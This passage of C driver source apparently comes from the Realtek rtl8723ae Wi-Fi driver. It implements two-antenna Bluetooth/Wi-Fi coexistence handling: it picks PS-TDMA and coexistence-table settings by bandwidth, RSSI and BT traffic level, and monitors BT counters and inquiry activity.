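/* 2-antenna strategy for HID / SCO / eSCO profiles: pick coex table,
 * sw mechanism and PS-TDMA bytes based on bandwidth, RSSI state and
 * BT Tx/Rx counter level.
 */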
static void rtl8723ae_dm_bt_2_ant_hid_sco_esco(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_phy *rtlphy = &(rtlpriv->phy);
struct btdm_8723 btdm8723;
u8 bt_rssi_state, bt_rssi_state1;
u8 bt_tx_rx_cnt_lvl;
rtl8723ae_dm_bt_btdm_structure_reload(hw, &btdm8723);
btdm8723.rf_rx_lpf_shrink = true;
btdm8723.low_penalty_rate_adaptive = true;
btdm8723.reject_aggre_pkt = false;
bt_tx_rx_cnt_lvl = rtl8723ae_dm_bt_bt_tx_rx_counter_level(hw);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters = %d\n", bt_tx_rx_cnt_lvl);
if (rtlphy->current_chan_bw == HT_CHANNEL_WIDTH_20_40) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG, "HT40\n");
/* coex table */
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0xffff;
btdm8723.val_0x6cc = 0x3;
/* sw mechanism */
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
/* fw mechanism */
btdm8723.ps_tdma_on = true;
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"HT20 or Legacy\n");
bt_rssi_state = rtl8723ae_dm_bt_check_coex_rssi_state(hw, 2,
47, 0);
bt_rssi_state1 = rtl8723ae_dm_bt_check_coex_rssi_state1(hw, 2,
27, 0);
/* coex table */
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0xffff;
btdm8723.val_0x6cc = 0x3;
/* sw mechanism */
if ((bt_rssi_state == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi high\n");
btdm8723.agc_table_en = true;
btdm8723.adc_back_off_on = true;
btdm8723.sw_dac_swing_on = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi low\n");
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
}
/* fw mechanism */
btdm8723.ps_tdma_on = true;
if ((bt_rssi_state1 == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state1 == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi-1 high\n");
/* Only when rssi is high do we need to do this;
 * when rssi is low, the value will be modified by fw.
 */
rtl_write_byte(rtlpriv, 0x883, 0x40);
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x83;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x83;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x83;
btdm8723.ps_tdma_byte[4] = 0x80;
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi-1 low\n");
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
}
}
}
if (rtl8723ae_dm_bt_need_to_dec_bt_pwr(hw))
btdm8723.dec_bt_pwr = true;
/* Always ignore WlanAct if bHid|bSCOBusy|bSCOeSCO */
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT btInqPageStartTime = 0x%x, btTxRxCntLvl = %d\n",
rtlhal->hal_coex_8723.bt_inq_page_start_time,
bt_tx_rx_cnt_lvl);
if ((rtlhal->hal_coex_8723.bt_inq_page_start_time) ||
(BT_TXRX_CNT_LEVEL_3 == bt_tx_rx_cnt_lvl)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], Set BT inquiry / page scan 0x3a setting\n");
btdm8723.ps_tdma_on = true;
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x2;
btdm8723.ps_tdma_byte[4] = 0x80;
}
if (rtl8723ae_dm_bt_is_coexist_state_changed(hw))
rtl8723ae_dm_bt_set_bt_dm(hw, &btdm8723);
}
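/* 2-antenna strategy for FTP / A2DP profiles, analogous to the
 * HID/SCO/eSCO handler above.
 */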
static void rtl8723ae_dm_bt_2_ant_fta2dp(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_phy *rtlphy = &(rtlpriv->phy);
struct btdm_8723 btdm8723;
u8 bt_rssi_state, bt_rssi_state1;
u32 bt_tx_rx_cnt_lvl;
rtl8723ae_dm_bt_btdm_structure_reload(hw, &btdm8723);
btdm8723.rf_rx_lpf_shrink = true;
btdm8723.low_penalty_rate_adaptive = true;
btdm8723.reject_aggre_pkt = false;
bt_tx_rx_cnt_lvl = rtl8723ae_dm_bt_bt_tx_rx_counter_level(hw);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters = %d\n", bt_tx_rx_cnt_lvl);
if (rtlphy->current_chan_bw == HT_CHANNEL_WIDTH_20_40) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG, "HT40\n");
bt_rssi_state = rtl8723ae_dm_bt_check_coex_rssi_state(hw, 2,
37, 0);
/* coex table */
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0xffff;
btdm8723.val_0x6cc = 0x3;
/* sw mechanism */
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = true;
btdm8723.sw_dac_swing_on = false;
/* fw mechanism */
btdm8723.ps_tdma_on = true;
if ((bt_rssi_state == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi high\n");
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi low\n");
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
}
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"HT20 or Legacy\n");
bt_rssi_state = rtl8723ae_dm_bt_check_coex_rssi_state(hw, 2,
47, 0);
bt_rssi_state1 = rtl8723ae_dm_bt_check_coex_rssi_state1(hw, 2,
27, 0);
/* coex table */
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0xffff;
btdm8723.val_0x6cc = 0x3;
/* sw mechanism */
if ((bt_rssi_state == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi high\n");
btdm8723.agc_table_en = true;
btdm8723.adc_back_off_on = true;
btdm8723.sw_dac_swing_on = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi low\n");
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
}
/* fw mechanism */
btdm8723.ps_tdma_on = true;
if ((bt_rssi_state1 == BT_RSSI_STATE_HIGH) ||
(bt_rssi_state1 == BT_RSSI_STATE_STAY_HIGH)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi-1 high\n");
/* Only when rssi is high do we need to do this;
 * when rssi is low, the value will be modified by fw.
 */
rtl_write_byte(rtlpriv, 0x883, 0x40);
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x81;
btdm8723.ps_tdma_byte[4] = 0x80;
}
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi rssi-1 low\n");
if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
} else if (bt_tx_rx_cnt_lvl == BT_TXRX_CNT_LEVEL_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters >= 1200 && < 1400\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xa;
btdm8723.ps_tdma_byte[2] = 0xa;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters < 1200\n");
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0xf;
btdm8723.ps_tdma_byte[2] = 0xf;
btdm8723.ps_tdma_byte[3] = 0x0;
btdm8723.ps_tdma_byte[4] = 0x80;
}
}
}
if (rtl8723ae_dm_bt_need_to_dec_bt_pwr(hw))
btdm8723.dec_bt_pwr = true;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT btInqPageStartTime = 0x%x, btTxRxCntLvl = %d\n",
rtlhal->hal_coex_8723.bt_inq_page_start_time,
bt_tx_rx_cnt_lvl);
if ((rtlhal->hal_coex_8723.bt_inq_page_start_time) ||
(BT_TXRX_CNT_LEVEL_3 == bt_tx_rx_cnt_lvl)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], Set BT inquiry / page scan 0x3a setting\n");
btdm8723.ps_tdma_on = true;
btdm8723.ps_tdma_byte[0] = 0xa3;
btdm8723.ps_tdma_byte[1] = 0x5;
btdm8723.ps_tdma_byte[2] = 0x5;
btdm8723.ps_tdma_byte[3] = 0x83;
btdm8723.ps_tdma_byte[4] = 0x80;
}
if (rtl8723ae_dm_bt_is_coexist_state_changed(hw))
rtl8723ae_dm_bt_set_bt_dm(hw, &btdm8723);
}
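/* Track BT inquiry/page activity: remember when it started and clear
 * the state once 10 seconds have elapsed since the start time.
 */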
static void rtl8723ae_dm_bt_inq_page_monitor(struct ieee80211_hw *hw)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
u32 cur_time = jiffies;
if (rtlhal->hal_coex_8723.c2h_bt_inquiry_page) {
/* bt inquiry or page is started. */
if (rtlhal->hal_coex_8723.bt_inq_page_start_time == 0) {
rtlpcipriv->bt_coexist.cstate |=
BT_COEX_STATE_BT_INQ_PAGE;
rtlhal->hal_coex_8723.bt_inq_page_start_time = cur_time;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT Inquiry/page is started at time : 0x%x\n",
rtlhal->hal_coex_8723.bt_inq_page_start_time);
}
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT Inquiry/page started time : 0x%x, cur_time : 0x%x\n",
rtlhal->hal_coex_8723.bt_inq_page_start_time, cur_time);
if (rtlhal->hal_coex_8723.bt_inq_page_start_time) {
if ((((long)cur_time -
(long)rtlhal->hal_coex_8723.bt_inq_page_start_time) / HZ) >=
10) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT Inquiry/page >= 10sec!!!");
rtlhal->hal_coex_8723.bt_inq_page_start_time = 0;
rtlpcipriv->bt_coexist.cstate &=
~BT_COEX_STATE_BT_INQ_PAGE;
}
}
}
static void rtl8723ae_dm_bt_reset_action_profile_state(struct ieee80211_hw *hw)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
rtlpcipriv->bt_coexist.cstate &=
~(BT_COEX_STATE_PROFILE_HID | BT_COEX_STATE_PROFILE_A2DP |
BT_COEX_STATE_PROFILE_PAN | BT_COEX_STATE_PROFILE_SCO);
rtlpcipriv->bt_coexist.cstate &=
~(BT_COEX_STATE_BTINFO_COMMON |
BT_COEX_STATE_BTINFO_B_HID_SCOESCO |
BT_COEX_STATE_BTINFO_B_FTP_A2DP);
}
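/* Main 2-antenna coexistence dispatcher: decode the firmware BT info
 * byte and run the matching profile handler.
 */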
static void _rtl8723ae_dm_bt_coexist_2_ant(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 bt_info_original;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex] Get bt info by fw!!\n");
_rtl8723_dm_bt_check_wifi_state(hw);
if (rtlhal->hal_coex_8723.c2h_bt_info_req_sent) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex] c2h for btInfo not rcvd yet!!\n");
}
bt_info_original = rtlhal->hal_coex_8723.c2h_bt_info_original;
/* When BT is doing inquiry or page scan, we have to set h2c 0x25
 * to ignore wlan_act for a continuous 4x2 secs.
 */
rtl8723ae_dm_bt_inq_page_monitor(hw);
rtl8723ae_dm_bt_reset_action_profile_state(hw);
if (rtl8723ae_dm_bt_is_2_ant_common_action(hw)) {
rtlpcipriv->bt_coexist.bt_profile_case = BT_COEX_MECH_COMMON;
rtlpcipriv->bt_coexist.bt_profile_action = BT_COEX_MECH_COMMON;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Action 2-Ant common.\n");
} else {
if ((bt_info_original & BTINFO_B_HID) ||
(bt_info_original & BTINFO_B_SCO_BUSY) ||
(bt_info_original & BTINFO_B_SCO_ESCO)) {
rtlpcipriv->bt_coexist.cstate |=
BT_COEX_STATE_BTINFO_B_HID_SCOESCO;
rtlpcipriv->bt_coexist.bt_profile_case =
BT_COEX_MECH_HID_SCO_ESCO;
rtlpcipriv->bt_coexist.bt_profile_action =
BT_COEX_MECH_HID_SCO_ESCO;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BTInfo: bHid|bSCOBusy|bSCOeSCO\n");
rtl8723ae_dm_bt_2_ant_hid_sco_esco(hw);
} else if ((bt_info_original & BTINFO_B_FTP) ||
(bt_info_original & BTINFO_B_A2DP)) {
rtlpcipriv->bt_coexist.cstate |=
BT_COEX_STATE_BTINFO_B_FTP_A2DP;
rtlpcipriv->bt_coexist.bt_profile_case =
BT_COEX_MECH_FTP_A2DP;
rtlpcipriv->bt_coexist.bt_profile_action =
BT_COEX_MECH_FTP_A2DP;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"BTInfo: bFTP|bA2DP\n");
rtl8723ae_dm_bt_2_ant_fta2dp(hw);
} else {
rtlpcipriv->bt_coexist.cstate |=
BT_COEX_STATE_BTINFO_B_HID_SCOESCO;
rtlpcipriv->bt_coexist.bt_profile_case =
BT_COEX_MECH_NONE;
rtlpcipriv->bt_coexist.bt_profile_action =
BT_COEX_MECH_NONE;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BTInfo: undefined case!!!!\n");
rtl8723ae_dm_bt_2_ant_hid_sco_esco(hw);
}
}
}
static void _rtl8723ae_dm_bt_coexist_1_ant(struct ieee80211_hw *hw)
{
}
void rtl8723ae_dm_bt_hw_coex_all_off_8723a(struct ieee80211_hw *hw)
{
rtl8723ae_dm_bt_set_coex_table(hw, 0x5a5aaaaa, 0xcc, 0x3);
rtl8723ae_dm_bt_set_hw_pta_mode(hw, true);
}
void rtl8723ae_dm_bt_fw_coex_all_off_8723a(struct ieee80211_hw *hw)
{
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw, false);
rtl8723ae_dm_bt_set_fw_3a(hw, 0x0, 0x0, 0x0, 0x8, 0x0);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, false, false);
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, false,
TDMA_2ANT, TDMA_NAV_OFF);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, false, TDMA_2ANT,
TDMA_NAV_OFF, TDMA_DAC_SWING_OFF);
rtl8723ae_dm_bt_set_fw_dac_swing_level(hw, 0);
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, false);
rtl8723ae_dm_bt_set_fw_bt_retry_index(hw, 2);
rtl8723ae_dm_bt_set_fw_wlan_act(hw, 0x10, 0x10);
rtl8723ae_dm_bt_set_fw_dec_bt_pwr(hw, false);
}
void rtl8723ae_dm_bt_sw_coex_all_off_8723a(struct ieee80211_hw *hw)
{
rtl8723ae_dm_bt_agc_table(hw, BT_AGCTABLE_OFF);
rtl8723ae_dm_bt_bback_off_level(hw, BT_BB_BACKOFF_OFF);
rtl8723ae_dm_bt_reject_ap_aggregated_packet(hw, false);
rtl8723ae_bt_set_penalty_tx_rate_adap(hw, BT_TX_RATE_ADAPTIVE_NORMAL);
rtl8723ae_dm_bt_set_sw_rf_rx_lpf_corner(hw, BT_RF_RX_LPF_CORNER_RESUME);
rtl8723ae_dm_bt_set_sw_full_time_dac_swing(hw, false, 0xc0);
}
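/* Request BT status info from firmware (H2C command 0x38); the reply
 * arrives later as a C2H BT_INFO event.
 */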
static void rtl8723ae_dm_bt_query_bt_information(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
u8 h2c_parameter[1] = {0};
rtlhal->hal_coex_8723.c2h_bt_info_req_sent = true;
h2c_parameter[0] |= BIT(0);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"Query Bt information, write 0x38 = 0x%x\n",
h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x38, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_bt_hw_counters_monitor(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u32 reg_htx_rx, reg_ltx_rx, u32_tmp;
u32 reg_htx, reg_hrx, reg_ltx, reg_lrx;
reg_htx_rx = REG_HIGH_PRIORITY_TXRX;
reg_ltx_rx = REG_LOW_PRIORITY_TXRX;
u32_tmp = rtl_read_dword(rtlpriv, reg_htx_rx);
reg_htx = u32_tmp & MASKLWORD;
reg_hrx = (u32_tmp & MASKHWORD)>>16;
u32_tmp = rtl_read_dword(rtlpriv, reg_ltx_rx);
reg_ltx = u32_tmp & MASKLWORD;
reg_lrx = (u32_tmp & MASKHWORD)>>16;
if (rtlpcipriv->bt_coexist.lps_counter > 1) {
reg_htx %= rtlpcipriv->bt_coexist.lps_counter;
reg_hrx %= rtlpcipriv->bt_coexist.lps_counter;
reg_ltx %= rtlpcipriv->bt_coexist.lps_counter;
reg_lrx %= rtlpcipriv->bt_coexist.lps_counter;
}
rtlhal->hal_coex_8723.high_priority_tx = reg_htx;
rtlhal->hal_coex_8723.high_priority_rx = reg_hrx;
rtlhal->hal_coex_8723.low_priority_tx = reg_ltx;
rtlhal->hal_coex_8723.low_priority_rx = reg_lrx;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"High Priority Tx/Rx (reg 0x%x)=%x(%d)/%x(%d)\n",
reg_htx_rx, reg_htx, reg_htx, reg_hrx, reg_hrx);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Low Priority Tx/Rx (reg 0x%x)=%x(%d)/%x(%d)\n",
reg_ltx_rx, reg_ltx, reg_ltx, reg_lrx, reg_lrx);
rtlpcipriv->bt_coexist.lps_counter = 0;
}
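/* Infer from the priority Tx/Rx counters whether the BT side is alive;
 * treat all-zero readings (twice in a row) or stuck 0xeaea/0xffff
 * readings as "BT disabled".
 */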
static void rtl8723ae_dm_bt_bt_enable_disable_check(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
bool bt_alife = true;
if (rtlhal->hal_coex_8723.high_priority_tx == 0 &&
rtlhal->hal_coex_8723.high_priority_rx == 0 &&
rtlhal->hal_coex_8723.low_priority_tx == 0 &&
rtlhal->hal_coex_8723.low_priority_rx == 0)
bt_alife = false;
if (rtlhal->hal_coex_8723.high_priority_tx == 0xeaea &&
rtlhal->hal_coex_8723.high_priority_rx == 0xeaea &&
rtlhal->hal_coex_8723.low_priority_tx == 0xeaea &&
rtlhal->hal_coex_8723.low_priority_rx == 0xeaea)
bt_alife = false;
if (rtlhal->hal_coex_8723.high_priority_tx == 0xffff &&
rtlhal->hal_coex_8723.high_priority_rx == 0xffff &&
rtlhal->hal_coex_8723.low_priority_tx == 0xffff &&
rtlhal->hal_coex_8723.low_priority_rx == 0xffff)
bt_alife = false;
if (bt_alife) {
rtlpcipriv->bt_coexist.bt_active_zero_cnt = 0;
rtlpcipriv->bt_coexist.cur_bt_disabled = false;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"8723A BT is enabled !!\n");
} else {
rtlpcipriv->bt_coexist.bt_active_zero_cnt++;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"8723A bt all counters = 0, %d times!!\n",
rtlpcipriv->bt_coexist.bt_active_zero_cnt);
if (rtlpcipriv->bt_coexist.bt_active_zero_cnt >= 2) {
rtlpcipriv->bt_coexist.cur_bt_disabled = true;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"8723A BT is disabled !!\n");
}
}
if (rtlpcipriv->bt_coexist.pre_bt_disabled !=
